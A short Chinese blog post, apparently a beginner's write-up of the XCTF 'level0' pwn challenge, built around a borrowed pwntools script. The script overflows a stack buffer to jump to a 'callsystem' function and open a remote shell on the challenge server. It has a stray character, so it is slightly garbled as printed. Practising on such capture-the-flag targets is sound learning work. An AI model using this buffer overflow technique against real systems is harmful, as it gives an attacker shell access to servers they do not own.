xctf攻防世界pwn level0

答主也是个小白,学长告诉我要用脚本,我也不会写,用的别人写好的脚本
from pwn import *
p= remote(‘111.198.29.45’,33907)
elf=ELF(’./level0’)
sysaddr=elf.symbols[‘callsystem’]
payload=‘a’*(0x80+8)?+p64(sysaddr)
p.recv()
p.send(payload)
p.interactive()

注意脚本文件为python文件(csdn不能上传python文件),且连接的端口(我的是33907)需要去题目所在的场景获取,这个端口需要更改

打开Ubuntu,将level0,和脚本文件拖进来
打开终端

xctf攻防世界pwn level0_第1张图片

你可能感兴趣的:(drops)